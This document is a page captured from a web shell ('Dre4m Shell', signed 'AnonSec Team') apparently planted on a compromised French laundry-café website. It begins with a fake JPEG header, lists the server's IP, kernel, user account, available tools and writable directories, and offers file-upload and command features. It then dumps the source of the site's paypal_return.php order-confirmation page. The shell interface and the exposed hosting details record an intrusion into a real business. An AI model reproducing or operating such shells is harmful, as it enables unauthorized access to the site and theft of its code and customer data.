ÿØÿàJFIF``ÿþxØ Dre4m Was Here
Dre4m Shell
Server IP : 109.234.164.53  /  Your IP : 216.73.216.110
Web Server : Apache
System : Linux cervelle.o2switch.net 4.18.0-553.32.1.lve.el8.x86_64 #1 SMP Thu Dec 19 13:14:03 UTC 2024 x86_64
User : computer3 ( 1098)
PHP Version : 7.1.33
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /home/computer3/lespotdulinge.fr/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME SHELL ]     

Current File : /home/computer3/lespotdulinge.fr/paypal_return.php
<?php
session_start();
  // Chargement fichiers de configuration...
  require('includes/thema_get.php');
  require('libs/Smarty.class.php');
  require('includes/webzone.php');

  // Démarrage du moteur TPL...
   $smarty = new Smarty;

  // Chargement des Fonctions Globals...
   include(DIR_WS_INCLUDES . 'session_start.php');
   require('fonctions.php');

 // Recherche Bottom... 
    $list = get_select_2(array('table'=>'fixed_pages', 'where1'=>'name', 'where2'=>'"Bottom"', 'where3'=>'langue', 'where4'=>'"' . $language . '"'));
    $smarty->assign("status_bottom_on", $list[0]['status']);
    $smarty->assign("bottom", $list[0]['content']);

 // Page fixe...
    $seo ="13";
    $smarty->assign("language", $language);

    $list = get_select_2(array('table'=>'pages', 'where1'=>'categorie', 'where2'=>'"' . $seo. '"', 'where3'=>'langue', 'where4'=>'"' . $language . '"'));
    $slide = $list[0]['slideshow'];
         
    $smarty->assign("title_page", "Enl&egrave;vement, Le Spot du Linge Bayonne 64");
    $smarty->assign("meta_description", "Enl&egrave;vement &grave; domicile de votre linge..., Le Spot du Linge Bayonne 64");
    $smarty->assign("meta_keywords", "lavage linge domicile pas cher bel blanc pressing bayonne 64");
    $smarty->assign("slide", $list[0]['slideshow']);
 //   $smarty->assign('list',$list);

 // Slideshows Pub...
  if (($slideshows_on > 0) and ($slide > 0)){
  $list = get_select(array('table'=>'slideshows', 'where1'=>'categorie', 'where2'=>'"'.$slide.'"'));
       $type = $list[0]['type'];$smarty->assign("picture_type", $type);
       $animation = $list[0]['animation'];$smarty->assign("animation", $animation);

  $list = get_select_2(array('table'=>'slideshow_pictures', 'where1'=>'slideshow', 'where2'=>'"' . $slide. '"', 'where3'=>'langue', 'where4'=>'"' . $language . '"', 'order'=>'position'));
    $pict = $list[0]['picture'];$smarty->assign("on_picture_slideshow", $pict);
    if ($list[0]['position'] < '2') { $pole_video = $list[0]['video']; }
    $smarty->assign('pole_video',$pole_video);
    $smarty->assign('slideshow',$list);
}


/*******************************************************************/ 
   $token = $_GET['token'];
?>

<!DOCTYPE HTML>
<html lang="fr">
<head>
<title>Le Spot du Linge</title>
<meta name="generator" content="Seomedias (www.seomedias.com)"/>
<!-- Code projected by SeOmedias (fr) / ShapeBootstrap-inhead. All Rights Reserved. -->
<meta http-equiv="content-type" content="text/html; charset=UTF-8"/>
<meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.5, shrink-to-fit=no">
<meta http-equiv="X-UA-Compatible" content="IE=edge"/>
<meta name="description" content="Le Spot Du Linge : Café- Laverie & Beauté Express ou  Nouveau Concept de Lieu de Vie à Bayonne."/>
<meta name="keywords" content="spot,linge,laverie,cafe,beaute,bayonne"/>
<!--Rsx -->
<link rel="apple-touch-icon" sizes="57x57" href="uploadfiles/favicon/apple-icon-57x57.png"/>
<link rel="apple-touch-icon" sizes="60x60" href="uploadfiles/favicon/apple-icon-60x60.png"/>
<link rel="apple-touch-icon" sizes="72x72" href="uploadfiles/favicon/apple-icon-72x72.png"/>
<link rel="apple-touch-icon" sizes="76x76" href="uploadfiles/favicon/apple-icon-76x76.png"/>
<link rel="apple-touch-icon" sizes="114x114" href="uploadfiles/favicon/apple-icon-114x114.png"/>
<link rel="apple-touch-icon" sizes="120x120" href="uploadfiles/favicon/apple-icon-120x120.png"/>
<link rel="apple-touch-icon" sizes="144x144" href="uploadfiles/favicon/apple-icon-144x144.png"/>
<link rel="apple-touch-icon" sizes="152x152" href="uploadfiles/favicon/apple-icon-152x152.png"/>
<link rel="apple-touch-icon" sizes="180x180" href="uploadfiles/favicon/apple-icon-180x180.png"/>
<link rel="icon" type="image/png" sizes="192x192" href="uploadfiles/favicon/android-icon-192x192.png"/>
<link rel="icon" type="image/png" sizes="32x32" href="uploadfiles/favicon/favicon-32x32.png"/>
<link rel="icon" type="image/png" sizes="96x96" href="uploadfiles/favicon/favicon-96x96.png"/>
<link rel="icon" type="image/png" sizes="16x16" href="uploadfiles/favicon/favicon-16x16.png"/>
<link rel="manifest" href="uploadfiles/favicon/manifest.json"/>
<meta name="msapplication-TileColor" content="#ffffff"/>
<meta name="msapplication-TileImage" content="uploadfiles/favicon/ms-icon-144x144.png"/>
<meta name="theme-color" content="#ffffff"/>     
<!-- Global CSS theme-->
<link href="business/css/bootstrap.min.css" rel="stylesheet"/>
<link href="business/css/font-awesome.min.css" rel="stylesheet"/>
<link href="business/css/animate.min.css" rel="stylesheet"/>
<link href="business/css/prettyPhoto.css" rel="stylesheet"/>
<link href="business/css/main.css" rel="stylesheet"/>
<link href="business/css/responsive.css" rel="stylesheet"/>
<link rel="stylesheet" type="text/css" href="//fonts.googleapis.com/css?family=Open+Sans"/>
<link rel="stylesheet" type="text/css" href="//fonts.googleapis.com/css?family=Roboto"/>
<!--[if lt IE 9]>
  <script src="business/js/html5shiv.js"></script>
  <script src="business/js/respond.min.js"></script>
  <![endif]-->
<!-- Global CSS -->
<link type="text/css" rel="stylesheet" href="business/dist/lity.min.css"/>
<link type="text/css" rel="stylesheet" href="business/css/global_slide.css"/>
<link type="text/css" rel="stylesheet" href="business/css/global.php"/>
<!--[if lt IE 9]> 
  <link type="text/css" rel="stylesheet" href="business/css/globalIE8.php"/>      
   <![endif]-->
<link rel="stylesheet" type="text/css" href="business/css/imprimante.css" media="print"/>
<!-- start to top -->
<link rel="stylesheet" href="start_to_top/style.css"/>
<link href="business/business/global-css.css" rel="stylesheet"/>
<!-- Gem style -->
<script src="start_to_top/modernizr.js"></script>

</head>
























<body>
<div class="container">
<div class="row">
<div class="col-md-3" style="background:transparent;">
</div>

<div class="col-md-4">
<div class="content" style="background:#FFFFFF;text-align:center">
<br>
      <img src="https://www.lespotdulinge.fr/business/images/15451493140LeSpotDuLinge_LogoOn.png" alt="" />
<br>
Votre commande nous a bien été transmise et nous vous remercions de votre 
confiance. 
<br><br>		
		
<div class="btnn">		        <a href="./" class="bouton">Retour au site</a></div>
</div>
</div>

<div class="col-md-3"  style="background:transparent;">
</div>


</div>
</div>
</body> 
</html>

Anon7 - 2022
AnonSec Team